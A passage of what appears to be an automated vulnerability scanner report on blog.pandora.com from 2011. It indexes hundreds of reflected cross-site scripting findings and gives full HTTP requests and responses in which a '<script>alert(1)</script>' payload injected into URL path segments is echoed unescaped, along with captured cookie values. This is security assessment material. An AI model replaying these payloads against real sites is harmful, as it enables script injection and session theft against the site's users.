1.363. http://blog.pandora.com/pandora/archives/new-jersey/ [REST URL parameter 3]

1.364. http://blog.pandora.com/pandora/archives/new-york/ [REST URL parameter 1]

1.365. http://blog.pandora.com/pandora/archives/new-york/ [REST URL parameter 2]

1.366. http://blog.pandora.com/pandora/archives/new-york/ [REST URL parameter 3]

1.367. http://blog.pandora.com/pandora/archives/north-carolina/ [REST URL parameter 1]

1.368. http://blog.pandora.com/pandora/archives/north-carolina/ [REST URL parameter 2]

1.369. http://blog.pandora.com/pandora/archives/north-carolina/ [REST URL parameter 3]

1.370. http://blog.pandora.com/pandora/archives/north-dakota/ [REST URL parameter 1]

1.371. http://blog.pandora.com/pandora/archives/north-dakota/ [REST URL parameter 2]

1.372. http://blog.pandora.com/pandora/archives/north-dakota/ [REST URL parameter 3]

1.373. http://blog.pandora.com/pandora/archives/ohio/ [REST URL parameter 1]

1.374. http://blog.pandora.com/pandora/archives/ohio/ [REST URL parameter 2]

1.375. http://blog.pandora.com/pandora/archives/ohio/ [REST URL parameter 3]

1.376. http://blog.pandora.com/pandora/archives/oregon/ [REST URL parameter 1]

1.377. http://blog.pandora.com/pandora/archives/oregon/ [REST URL parameter 2]

1.378. http://blog.pandora.com/pandora/archives/oregon/ [REST URL parameter 3]

1.379. http://blog.pandora.com/pandora/archives/other-states/ [REST URL parameter 1]

1.380. http://blog.pandora.com/pandora/archives/other-states/ [REST URL parameter 2]

1.381. http://blog.pandora.com/pandora/archives/other-states/ [REST URL parameter 3]

1.382. http://blog.pandora.com/pandora/archives/other_states/index.html [REST URL parameter 1]

1.383. http://blog.pandora.com/pandora/archives/other_states/index.html [REST URL parameter 2]

1.384. http://blog.pandora.com/pandora/archives/other_states/index.html [REST URL parameter 3]

1.385. http://blog.pandora.com/pandora/archives/other_states/index.html [REST URL parameter 4]

1.386. http://blog.pandora.com/pandora/archives/pennsylvania/ [REST URL parameter 1]

1.387. http://blog.pandora.com/pandora/archives/pennsylvania/ [REST URL parameter 2]

1.388. http://blog.pandora.com/pandora/archives/pennsylvania/ [REST URL parameter 3]

1.389. http://blog.pandora.com/pandora/archives/play-listen-repeat/ [REST URL parameter 1]

1.390. http://blog.pandora.com/pandora/archives/play-listen-repeat/ [REST URL parameter 2]

1.391. http://blog.pandora.com/pandora/archives/play-listen-repeat/ [REST URL parameter 3]

1.392. http://blog.pandora.com/pandora/archives/rhode-island/ [REST URL parameter 1]

1.393. http://blog.pandora.com/pandora/archives/rhode-island/ [REST URL parameter 2]

1.394. http://blog.pandora.com/pandora/archives/rhode-island/ [REST URL parameter 3]

1.395. http://blog.pandora.com/pandora/archives/roadtrip/ [REST URL parameter 1]

1.396. http://blog.pandora.com/pandora/archives/roadtrip/ [REST URL parameter 2]

1.397. http://blog.pandora.com/pandora/archives/roadtrip/ [REST URL parameter 3]

1.398. http://blog.pandora.com/pandora/archives/roadtrip/index.html [REST URL parameter 1]

1.399. http://blog.pandora.com/pandora/archives/roadtrip/index.html [REST URL parameter 2]

1.400. http://blog.pandora.com/pandora/archives/roadtrip/index.html [REST URL parameter 3]

1.401. http://blog.pandora.com/pandora/archives/roadtrip/index.html [REST URL parameter 4]

1.402. http://blog.pandora.com/pandora/archives/south-daktoa/ [REST URL parameter 1]

1.403. http://blog.pandora.com/pandora/archives/south-daktoa/ [REST URL parameter 2]

1.404. http://blog.pandora.com/pandora/archives/south-daktoa/ [REST URL parameter 3]

1.405. http://blog.pandora.com/pandora/archives/tennessee/ [REST URL parameter 1]

1.406. http://blog.pandora.com/pandora/archives/tennessee/ [REST URL parameter 2]

1.407. http://blog.pandora.com/pandora/archives/tennessee/ [REST URL parameter 3]

1.408. http://blog.pandora.com/pandora/archives/texas/ [REST URL parameter 1]

1.409. http://blog.pandora.com/pandora/archives/texas/ [REST URL parameter 2]

1.410. http://blog.pandora.com/pandora/archives/texas/ [REST URL parameter 3]

1.411. http://blog.pandora.com/pandora/archives/utah/ [REST URL parameter 1]

1.412. http://blog.pandora.com/pandora/archives/utah/ [REST URL parameter 2]

1.413. http://blog.pandora.com/pandora/archives/utah/ [REST URL parameter 3]

1.414. http://blog.pandora.com/pandora/archives/virginia/ [REST URL parameter 1]

1.415. http://blog.pandora.com/pandora/archives/virginia/ [REST URL parameter 2]

1.416. http://blog.pandora.com/pandora/archives/virginia/ [REST URL parameter 3]

1.417. http://blog.pandora.com/pandora/archives/washington-dc/ [REST URL parameter 1]

1.418. http://blog.pandora.com/pandora/archives/washington-dc/ [REST URL parameter 2]

1.419. http://blog.pandora.com/pandora/archives/washington-dc/ [REST URL parameter 3]

1.420. http://blog.pandora.com/pandora/archives/washington/ [REST URL parameter 1]

1.421. http://blog.pandora.com/pandora/archives/washington/ [REST URL parameter 2]

1.422. http://blog.pandora.com/pandora/archives/washington/ [REST URL parameter 3]

1.423. http://blog.pandora.com/pandora/assets_c/2010/11/North [REST URL parameter 1]

1.424. http://blog.pandora.com/pandora/assets_c/2010/11/North [REST URL parameter 2]

1.425. http://blog.pandora.com/pandora/assets_c/2010/11/North [REST URL parameter 3]

1.426. http://blog.pandora.com/pandora/assets_c/2010/11/North [REST URL parameter 4]

1.427. http://blog.pandora.com/pandora/assets_c/2010/11/North [REST URL parameter 5]

1.428. http://blog.pandora.com/pandora/assets_c/2010/11/North [name of an arbitrarily supplied request parameter]

1.429. http://blog.pandora.com/pandora/assets_c/2010/11/sd [REST URL parameter 1]

1.430. http://blog.pandora.com/pandora/assets_c/2010/11/sd [REST URL parameter 2]

1.431. http://blog.pandora.com/pandora/assets_c/2010/11/sd [REST URL parameter 3]

1.432. http://blog.pandora.com/pandora/assets_c/2010/11/sd [REST URL parameter 4]

1.433. http://blog.pandora.com/pandora/assets_c/2010/11/sd [REST URL parameter 5]

1.434. http://blog.pandora.com/pandora/assets_c/2010/11/sd [name of an arbitrarily supplied request parameter]

1.435. http://blog.pandora.com/pandora/index.xml [REST URL parameter 1]

1.436. http://blog.pandora.com/pandora/index.xml [REST URL parameter 2]

1.437. http://blog.pandora.com/pandora/jquery.dimension.js [REST URL parameter 1]

1.438. http://blog.pandora.com/pandora/jquery.dimension.js [REST URL parameter 2]

1.439. http://blog.pandora.com/pandora/jquery.js [REST URL parameter 1]

1.440. http://blog.pandora.com/pandora/jquery.js [REST URL parameter 2]

1.441. http://blog.pandora.com/pandora/menuManager.js [REST URL parameter 1]

1.442. http://blog.pandora.com/pandora/menuManager.js [REST URL parameter 2]

1.443. http://blog.pandora.com/pandora/styles-site.css [REST URL parameter 1]

1.444. http://blog.pandora.com/pandora/styles-site.css [REST URL parameter 2]

1.445. http://blog.pandora.com/press [REST URL parameter 1]

1.446. http://blog.pandora.com/show [REST URL parameter 1]

1.447. http://blog.pandora.com/show/ [REST URL parameter 1]

2. Cross-domain POST

3. Cross-domain script include

3.1. http://blog.pandora.com/faq/

3.2. http://blog.pandora.com/pandora/

3.3. http://blog.pandora.com/pandora/archives/arizona/

3.4. http://blog.pandora.com/pandora/archives/california/

3.5. http://blog.pandora.com/pandora/archives/colorado/

3.6. http://blog.pandora.com/pandora/archives/florida/

3.7. http://blog.pandora.com/pandora/archives/georgia/

3.8. http://blog.pandora.com/pandora/archives/illinois/

3.9. http://blog.pandora.com/pandora/archives/indiana/

3.10. http://blog.pandora.com/pandora/archives/louisiana/

3.11. http://blog.pandora.com/pandora/archives/maine/

3.12. http://blog.pandora.com/pandora/archives/maryland/

3.13. http://blog.pandora.com/pandora/archives/massachusetts/

3.14. http://blog.pandora.com/pandora/archives/michigan/

3.15. http://blog.pandora.com/pandora/archives/minnesota/

3.16. http://blog.pandora.com/pandora/archives/mississippi/

3.17. http://blog.pandora.com/pandora/archives/missouri/

3.18. http://blog.pandora.com/pandora/archives/nebraska/

3.19. http://blog.pandora.com/pandora/archives/new-jersey/

3.20. http://blog.pandora.com/pandora/archives/new-york/

3.21. http://blog.pandora.com/pandora/archives/north-carolina/

3.22. http://blog.pandora.com/pandora/archives/north-dakota/

3.23. http://blog.pandora.com/pandora/archives/ohio/

3.24. http://blog.pandora.com/pandora/archives/oregon/

3.25. http://blog.pandora.com/pandora/archives/other-states/

3.26. http://blog.pandora.com/pandora/archives/other_states/index.html

3.27. http://blog.pandora.com/pandora/archives/pennsylvania/

3.28. http://blog.pandora.com/pandora/archives/play-listen-repeat/

3.29. http://blog.pandora.com/pandora/archives/rhode-island/

3.30. http://blog.pandora.com/pandora/archives/roadtrip/

3.31. http://blog.pandora.com/pandora/archives/roadtrip/index.html

3.32. http://blog.pandora.com/pandora/archives/south-daktoa/

3.33. http://blog.pandora.com/pandora/archives/tennessee/

3.34. http://blog.pandora.com/pandora/archives/texas/

3.35. http://blog.pandora.com/pandora/archives/utah/

3.36. http://blog.pandora.com/pandora/archives/virginia/

3.37. http://blog.pandora.com/pandora/archives/washington-dc/

3.38. http://blog.pandora.com/pandora/archives/washington/

4. Email addresses disclosed

4.1. http://blog.pandora.com/pandora/

4.2. http://blog.pandora.com/pandora/archives/2005/08/

4.3. http://blog.pandora.com/pandora/archives/2005/11/

4.4. http://blog.pandora.com/pandora/archives/2006/01/

4.5. http://blog.pandora.com/pandora/archives/2006/02/

4.6. http://blog.pandora.com/pandora/archives/2006/03/

4.7. http://blog.pandora.com/pandora/archives/2006/04/

4.8. http://blog.pandora.com/pandora/archives/2006/05/

4.9. http://blog.pandora.com/pandora/archives/2006/06/

4.10. http://blog.pandora.com/pandora/archives/2006/07/

4.11. http://blog.pandora.com/pandora/archives/2006/08/

4.12. http://blog.pandora.com/pandora/archives/2006/09/

4.13. http://blog.pandora.com/pandora/archives/2006/10/

4.14. http://blog.pandora.com/pandora/archives/2006/12/

4.15. http://blog.pandora.com/pandora/archives/2007/02/

4.16. http://blog.pandora.com/pandora/archives/2007/04/

4.17. http://blog.pandora.com/pandora/archives/2007/05/

4.18. http://blog.pandora.com/pandora/archives/2007/06/

4.19. http://blog.pandora.com/pandora/archives/2007/07/

4.20. http://blog.pandora.com/pandora/archives/2007/08/

4.21. http://blog.pandora.com/pandora/archives/2008/01/

4.22. http://blog.pandora.com/pandora/archives/2008/02/

4.23. http://blog.pandora.com/pandora/archives/2008/05/

4.24. http://blog.pandora.com/pandora/archives/2008/06/

4.25. http://blog.pandora.com/pandora/archives/2008/07/

4.26. http://blog.pandora.com/pandora/archives/2008/08/

4.27. http://blog.pandora.com/pandora/archives/2008/09/

4.28. http://blog.pandora.com/pandora/archives/2008/10/

4.29. http://blog.pandora.com/pandora/archives/2009/07/

4.30. http://blog.pandora.com/pandora/archives/2010/06/

4.31. http://blog.pandora.com/pandora/archives/2010/11/

4.32. http://blog.pandora.com/pandora/archives/2010/11/fantastic-fargo.html

4.33. http://blog.pandora.com/pandora/archives/2010/11/town-halls-this.html

4.34. http://blog.pandora.com/pandora/archives/arizona/

4.35. http://blog.pandora.com/pandora/archives/california/

4.36. http://blog.pandora.com/pandora/archives/colorado/

4.37. http://blog.pandora.com/pandora/archives/florida/

4.38. http://blog.pandora.com/pandora/archives/georgia/

4.39. http://blog.pandora.com/pandora/archives/illinois/

4.40. http://blog.pandora.com/pandora/archives/indiana/

4.41. http://blog.pandora.com/pandora/archives/massachusetts/

4.42. http://blog.pandora.com/pandora/archives/michigan/

4.43. http://blog.pandora.com/pandora/archives/minnesota/

4.44. http://blog.pandora.com/pandora/archives/missouri/

4.45. http://blog.pandora.com/pandora/archives/new-york/

4.46. http://blog.pandora.com/pandora/archives/north-carolina/

4.47. http://blog.pandora.com/pandora/archives/ohio/

4.48. http://blog.pandora.com/pandora/archives/oregon/

4.49. http://blog.pandora.com/pandora/archives/pennsylvania/

4.50. http://blog.pandora.com/pandora/archives/rhode-island/

4.51. http://blog.pandora.com/pandora/archives/roadtrip/

4.52. http://blog.pandora.com/pandora/archives/roadtrip/index.html

4.53. http://blog.pandora.com/pandora/archives/texas/

4.54. http://blog.pandora.com/pandora/archives/virginia/

4.55. http://blog.pandora.com/pandora/archives/washington-dc/

4.56. http://blog.pandora.com/pandora/archives/washington/

4.57. http://blog.pandora.com/pandora/index.xml

4.58. http://blog.pandora.com/pandora/jquery.dimension.js

5. HTML does not specify charset

5.1. http://blog.pandora.com/

5.2. http://blog.pandora.com/pandora/archives/images/map.html

5.3. http://blog.pandora.com/pandora/assets_c/2010/11/North

5.4. http://blog.pandora.com/pandora/assets_c/2010/11/sd



1. Cross-site scripting (reflected)  next
There are 447 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://blog.pandora.com/faq [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /faq

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cc76e<script>alert(1)</script>bcb67c3cc6e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /faqcc76e<script>alert(1)</script>bcb67c3cc6e HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:07:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 327


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /faqcc76e<script>alert(1)</script>bcb67c3cc6e was not found on this server.</p>
...[SNIP]...

1.2. http://blog.pandora.com/faq/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /faq/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c9edc<script>alert(1)</script>e1d9afc7813 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /faqc9edc<script>alert(1)</script>e1d9afc7813/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:58 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 328


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /faqc9edc<script>alert(1)</script>e1d9afc7813/ was not found on this server.</p>
...[SNIP]...

1.3. http://blog.pandora.com/faq/index.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /faq/index.xml

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 21a51<script>alert(1)</script>fb51523ad13 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /faq21a51<script>alert(1)</script>fb51523ad13/index.xml HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:30 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 337


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /faq21a51<script>alert(1)</script>fb51523ad13/index.xml was not found on this server.</p>
...[SNIP]...

1.4. http://blog.pandora.com/faq/index.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /faq/index.xml

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d7f75<script>alert(1)</script>8dac30374f8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /faq/index.xmld7f75<script>alert(1)</script>8dac30374f8 HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:33 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 337


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /faq/index.xmld7f75<script>alert(1)</script>8dac30374f8 was not found on this server.</p>
...[SNIP]...

1.5. http://blog.pandora.com/jobs [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /jobs

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1bab7<script>alert(1)</script>a6fd1a47986 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jobs1bab7<script>alert(1)</script>a6fd1a47986 HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:07:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 328


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /jobs1bab7<script>alert(1)</script>a6fd1a47986 was not found on this server.</p>
...[SNIP]...

1.6. http://blog.pandora.com/pandora/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8a2e2<script>alert(1)</script>bf577de6d6e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora8a2e2<script>alert(1)</script>bf577de6d6e/ HTTP/1.1
Host: blog.pandora.com
Proxy-Connection: keep-alive
Referer: http://blog.pandora.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __qca=P0-1331252260-1294536122836; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; __utmb=118078728.7.10.1294536123; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:34 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 332


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora8a2e2<script>alert(1)</script>bf577de6d6e/ was not found on this server.</p>
...[SNIP]...

1.7. http://blog.pandora.com/pandora/archives/2005/07/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2005/07/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 95a59<script>alert(1)</script>8e7980713e3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora95a59<script>alert(1)</script>8e7980713e3/archives/2005/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:27 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora95a59<script>alert(1)</script>8e7980713e3/archives/2005/07/ was not found on this server.</p>
...[SNIP]...

1.8. http://blog.pandora.com/pandora/archives/2005/07/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2005/07/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4a534<script>alert(1)</script>8a298db320 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives4a534<script>alert(1)</script>8a298db320/2005/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:29 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 348


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives4a534<script>alert(1)</script>8a298db320/2005/07/ was not found on this server.</p>
...[SNIP]...

1.9. http://blog.pandora.com/pandora/archives/2005/07/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2005/07/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8b191<script>alert(1)</script>638b7d947db was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20058b191<script>alert(1)</script>638b7d947db/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:32 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20058b191<script>alert(1)</script>638b7d947db/07/ was not found on this server.</p>
...[SNIP]...

1.10. http://blog.pandora.com/pandora/archives/2005/07/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2005/07/

